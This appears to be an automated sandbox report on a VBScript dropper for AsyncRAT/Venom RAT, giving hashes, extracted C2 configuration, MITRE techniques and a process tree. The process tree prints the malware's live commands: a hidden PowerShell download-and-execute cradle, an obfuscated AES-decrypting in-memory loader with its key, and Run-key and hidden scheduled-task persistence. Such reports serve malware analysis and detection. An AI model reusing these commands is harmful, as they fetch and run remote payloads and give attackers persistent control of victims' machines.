asyncrat | b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf

Analysis

max time kernel
93s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 02:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs
Size

67KB
MD5

9ffb1e62265a9b36d8c29afafc14f6fe
SHA1

7e0abfdff1019bf28267f069b6fdf6658eb742b5
SHA256

b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf
SHA512

7458a2fb582a0a314ff9d443515ab4379e9a71e26ccf0788e971898b32be58b64f82771dfc901eafe9e28db0755146432f02be5892fb64188c129e72f3d402f0
SSDEEP

1536:VpR0fCWy9wwuo9MIA9Y31BYfHAoH7XpUoQ0tThvi:j8vwwI9Mz9Y3GZ19Q6hvi

Score

10^/10

asyncrat py 2024 execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

py 2024

45.88.88.7:6987

Mutex

vojifcrudluxshc

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3748-113-0x000001D41EC50000-0x000001D41EC68000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
36	3748	powershell.exe
38	3748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2388	powershell.exe
1876	powershell.exe
1948	powershell.exe
2600	powershell.exe
1696	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1404	timeout.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1948	powershell.exe
1948	powershell.exe
2444	powershell.exe
2444	powershell.exe
2600	powershell.exe
2600	powershell.exe
180	powershell.exe
180	powershell.exe
1696	powershell.exe
1696	powershell.exe
3748	powershell.exe
3748	powershell.exe
2388	powershell.exe
2388	powershell.exe
840	powershell.exe
840	powershell.exe
1876	powershell.exe
1876	powershell.exe
3748	powershell.exe
3748	powershell.exe
3748	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	180	powershell.exe
Token: SeIncreaseQuotaPrivilege	180	powershell.exe
Token: SeSecurityPrivilege	180	powershell.exe
Token: SeTakeOwnershipPrivilege	180	powershell.exe
Token: SeLoadDriverPrivilege	180	powershell.exe
Token: SeSystemProfilePrivilege	180	powershell.exe
Token: SeSystemtimePrivilege	180	powershell.exe
Token: SeProfSingleProcessPrivilege	180	powershell.exe
Token: SeIncBasePriorityPrivilege	180	powershell.exe
Token: SeCreatePagefilePrivilege	180	powershell.exe
Token: SeBackupPrivilege	180	powershell.exe
Token: SeRestorePrivilege	180	powershell.exe
Token: SeShutdownPrivilege	180	powershell.exe
Token: SeDebugPrivilege	180	powershell.exe
Token: SeSystemEnvironmentPrivilege	180	powershell.exe
Token: SeRemoteShutdownPrivilege	180	powershell.exe
Token: SeUndockPrivilege	180	powershell.exe
Token: SeManageVolumePrivilege	180	powershell.exe
Token: 33	180	powershell.exe
Token: 34	180	powershell.exe
Token: 35	180	powershell.exe
Token: 36	180	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeIncreaseQuotaPrivilege	1696	powershell.exe
Token: SeSecurityPrivilege	1696	powershell.exe
Token: SeTakeOwnershipPrivilege	1696	powershell.exe
Token: SeLoadDriverPrivilege	1696	powershell.exe
Token: SeSystemProfilePrivilege	1696	powershell.exe
Token: SeSystemtimePrivilege	1696	powershell.exe
Token: SeProfSingleProcessPrivilege	1696	powershell.exe
Token: SeIncBasePriorityPrivilege	1696	powershell.exe
Token: SeCreatePagefilePrivilege	1696	powershell.exe
Token: SeBackupPrivilege	1696	powershell.exe
Token: SeRestorePrivilege	1696	powershell.exe
Token: SeShutdownPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeSystemEnvironmentPrivilege	1696	powershell.exe
Token: SeRemoteShutdownPrivilege	1696	powershell.exe
Token: SeUndockPrivilege	1696	powershell.exe
Token: SeManageVolumePrivilege	1696	powershell.exe
Token: 33	1696	powershell.exe
Token: 34	1696	powershell.exe
Token: 35	1696	powershell.exe
Token: 36	1696	powershell.exe
Token: SeIncreaseQuotaPrivilege	1696	powershell.exe
Token: SeSecurityPrivilege	1696	powershell.exe
Token: SeTakeOwnershipPrivilege	1696	powershell.exe
Token: SeLoadDriverPrivilege	1696	powershell.exe
Token: SeSystemProfilePrivilege	1696	powershell.exe
Token: SeSystemtimePrivilege	1696	powershell.exe
Token: SeProfSingleProcessPrivilege	1696	powershell.exe
Token: SeIncBasePriorityPrivilege	1696	powershell.exe
Token: SeCreatePagefilePrivilege	1696	powershell.exe
Token: SeBackupPrivilege	1696	powershell.exe
Token: SeRestorePrivilege	1696	powershell.exe
Token: SeShutdownPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeSystemEnvironmentPrivilege	1696	powershell.exe
Token: SeRemoteShutdownPrivilege	1696	powershell.exe
Token: SeUndockPrivilege	1696	powershell.exe
Token: SeManageVolumePrivilege	1696	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3748	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 1948	4532	WScript.exe	82
PID 4532 wrote to memory of 1948	4532	WScript.exe	82
PID 4532 wrote to memory of 644	4532	WScript.exe	93
PID 4532 wrote to memory of 644	4532	WScript.exe	93
PID 644 wrote to memory of 4280	644	cmd.exe	95
PID 644 wrote to memory of 4280	644	cmd.exe	95
PID 4280 wrote to memory of 2568	4280	cmd.exe	97
PID 4280 wrote to memory of 2568	4280	cmd.exe	97
PID 4280 wrote to memory of 2444	4280	cmd.exe	98
PID 4280 wrote to memory of 2444	4280	cmd.exe	98
PID 2444 wrote to memory of 2600	2444	powershell.exe	99
PID 2444 wrote to memory of 2600	2444	powershell.exe	99
PID 2444 wrote to memory of 180	2444	powershell.exe	100
PID 2444 wrote to memory of 180	2444	powershell.exe	100
PID 2444 wrote to memory of 1696	2444	powershell.exe	102
PID 2444 wrote to memory of 1696	2444	powershell.exe	102
PID 2444 wrote to memory of 3096	2444	powershell.exe	104
PID 2444 wrote to memory of 3096	2444	powershell.exe	104
PID 3096 wrote to memory of 940	3096	cmd.exe	106
PID 3096 wrote to memory of 940	3096	cmd.exe	106
PID 940 wrote to memory of 1728	940	cmd.exe	108
PID 940 wrote to memory of 1728	940	cmd.exe	108
PID 940 wrote to memory of 3748	940	cmd.exe	109
PID 940 wrote to memory of 3748	940	cmd.exe	109
PID 3748 wrote to memory of 2388	3748	powershell.exe	110
PID 3748 wrote to memory of 2388	3748	powershell.exe	110
PID 3748 wrote to memory of 840	3748	powershell.exe	111
PID 3748 wrote to memory of 840	3748	powershell.exe	111
PID 3748 wrote to memory of 1876	3748	powershell.exe	113
PID 3748 wrote to memory of 1876	3748	powershell.exe	113
PID 4280 wrote to memory of 1404	4280	cmd.exe	115
PID 4280 wrote to memory of 1404	4280	cmd.exe	115

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b89759e93738b1b607e48a29f62bfda31e555b0aad30614c261ddf4ba10bdcdf.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),'LoaWwjgdWwjg'.Replace('Wwjg', ''),'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');powershell -w hidden;function aRtvG($VLEjt){$KNVsD=[System.Security.Cryptography.Aes]::Create();$KNVsD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KNVsD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');$KNVsD.IV=[System.Convert]::($tSzt[13])('Zwl9jKpodheYgolhwF+ZoA==');$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);$NvSea.Dispose();$KNVsD.Dispose();$ocMex;}function DyGwn($VLEjt){$TnJXr=New-Object System.IO.MemoryStream(,$VLEjt);$ALCZl=New-Object System.IO.MemoryStream;$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));$vftmX.($tSzt[0])($ALCZl);$vftmX.Dispose();$TnJXr.Dispose();$ALCZl.Dispose();$ALCZl.ToArray();}$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));$vtSyn=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 6).Substring(2))));[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);[System.Reflection.Assembly]::($tSzt[3])([byte[]]$AliFC).($tSzt[9]).($tSzt[6])($null,$null); "
      4⤵
      PID:2568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\system')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25492' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25492Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25492Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25492Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25492Man.cmd';$tSzt='CoyggSpyyggSTyggSoyggS'.Replace('yggS', ''),'TreKpmaneKpmsfeKpmormeKpmFeKpmineKpmaeKpmlBeKpmloceKpmkeKpm'.Replace('eKpm', ''),'ErHgtlemrHgtentrHgtAtrHgt'.Replace('rHgt', ''),'LoaWwjgdWwjg'.Replace('Wwjg', ''),'DecGFmyompGFmyrGFmyessGFmy'.Replace('GFmy', ''),'CrFbwFeFbwFateFbwFDecFbwFrFbwFyptFbwForFbwF'.Replace('FbwF', ''),'InhKbUvhKbUokehKbU'.Replace('hKbU', ''),'MaBxbRinBxbRMBxbRodBxbRulBxbReBxbR'.Replace('BxbR', ''),'SpYdNplpYdNipYdNtpYdN'.Replace('pYdN', ''),'EnthHmDryPhHmDoihHmDnthHmD'.Replace('hHmD', ''),'ReNXtTadLNXtTinNXtTesNXtT'.Replace('NXtT', ''),'GePRsKtCPRsKurPRsKrPRsKePRsKntPRsKPrPRsKoPRsKcPRsKesPRsKsPRsK'.Replace('PRsK', ''),'ChpQqmangpQqmeEpQqmxtepQqmnpQqmsipQqmonpQqm'.Replace('pQqm', ''),'FrrEElorEElmBarEElserEEl64rEElStrEElrrEElinrEElgrEEl'.Replace('rEEl', '');powershell -w hidden;function aRtvG($VLEjt){$KNVsD=[System.Security.Cryptography.Aes]::Create();$KNVsD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KNVsD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KNVsD.Key=[System.Convert]::($tSzt[13])('ZsQNWZMNttfFdanp5YMfjA81pjXlEiaRBDoUMbmKu7A=');$KNVsD.IV=[System.Convert]::($tSzt[13])('Zwl9jKpodheYgolhwF+ZoA==');$NvSea=$KNVsD.($tSzt[5])();$ocMex=$NvSea.($tSzt[1])($VLEjt,0,$VLEjt.Length);$NvSea.Dispose();$KNVsD.Dispose();$ocMex;}function DyGwn($VLEjt){$TnJXr=New-Object System.IO.MemoryStream(,$VLEjt);$ALCZl=New-Object System.IO.MemoryStream;$vftmX=New-Object System.IO.Compression.GZipStream($TnJXr,[IO.Compression.CompressionMode]::($tSzt[4]));$vftmX.($tSzt[0])($ALCZl);$vftmX.Dispose();$TnJXr.Dispose();$ALCZl.Dispose();$ALCZl.ToArray();}$bjAKz=[System.IO.File]::($tSzt[10])([Console]::Title);$AliFC=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 5).Substring(2))));$vtSyn=DyGwn (aRtvG ([Convert]::($tSzt[13])([System.Linq.Enumerable]::($tSzt[2])($bjAKz, 6).Substring(2))));[System.Reflection.Assembly]::($tSzt[3])([byte[]]$vtSyn).($tSzt[9]).($tSzt[6])($null,$null);[System.Reflection.Assembly]::($tSzt[3])([byte[]]$AliFC).($tSzt[9]).($tSzt[6])($null,$null); "
        7⤵
        
        PID:1728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25492Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25492' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25492Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1876
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bbb08cd650ab050591fa8e7d71de25a5

SHA1
f25add9d1a28e52d2881d331a9bf2ed9b468409a

SHA256
687c46daecc83ca21d26f2cf21ec136e964394eaf42f9d479ba304b791d452b7

SHA512
0e46b7489a2ee74a54f35fbe674881560fbb20abc9849c6898f2723960d0a4eca8ff8cbe66f4661909af78813b5ca6fe4de22c379877ce91ada4d40be2f4c00c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc2ce575753731574bf10ff6e5162032

SHA1
b660e5156f97af770e5d359fdd2a6ea697f359fb

SHA256
c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa

SHA512
715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
445a1630187278b1ac699063697ae7d6

SHA1
1e7482b7667961bed252876dfe40ed5ba3659a7c

SHA256
46357929749decc9d26b5e2c1de4798ad6ccac93ea89637f4a0d4f780ab0b845

SHA512
9fa6b53ddb3cbbb350685c0cb2b9802b97885891725666feac42ba09662ef2adf009b98c347cb7811a1aee1924d39b76d85fb9c5c839128cd0616af7fb24c70e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vidguero.qek.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
5f705dae5b64c2091db9b36fed377e74

SHA1
10209ca44ec5fc7289371296f0113e5001a7a3d2

SHA256
de81ae7b4398a1ec4091ad8e9ed9cf4fdc1ed88b7b1af8a5d07aacba1b0f4af7

SHA512
23b077a0fd01fa85a9f81b2f14db30a99a44bc3a1c45131f235fdf0c87542d33b4ea042db620fa50c924e214ce1e428eb05d0f651f7119979e07767df3b17878

Download Submit
memory/1948-12-0x00007FF9862B0000-0x00007FF986D71000-memory.dmp

Filesize
10.8MB

Download
memory/1948-17-0x00007FF9862B0000-0x00007FF986D71000-memory.dmp

Filesize
10.8MB

Download
memory/1948-14-0x00007FF9862B0000-0x00007FF986D71000-memory.dmp

Filesize
10.8MB

Download
memory/1948-13-0x00007FF9862B0000-0x00007FF986D71000-memory.dmp

Filesize
10.8MB

Download
memory/1948-0-0x00007FF9862B3000-0x00007FF9862B5000-memory.dmp

Filesize
8KB

Download
memory/1948-11-0x00007FF9862B0000-0x00007FF986D71000-memory.dmp

Filesize
10.8MB

Download
memory/1948-1-0x000001A58ABD0000-0x000001A58ABF2000-memory.dmp

Filesize
136KB

Download
memory/2444-32-0x000001635C9A0000-0x000001635C9E4000-memory.dmp

Filesize
272KB

Download
memory/2444-33-0x000001635CA70000-0x000001635CAE6000-memory.dmp

Filesize
472KB

Download
memory/2444-44-0x000001635C710000-0x000001635C720000-memory.dmp

Filesize
64KB

Download
memory/3748-113-0x000001D41EC50000-0x000001D41EC68000-memory.dmp

Filesize
96KB

Download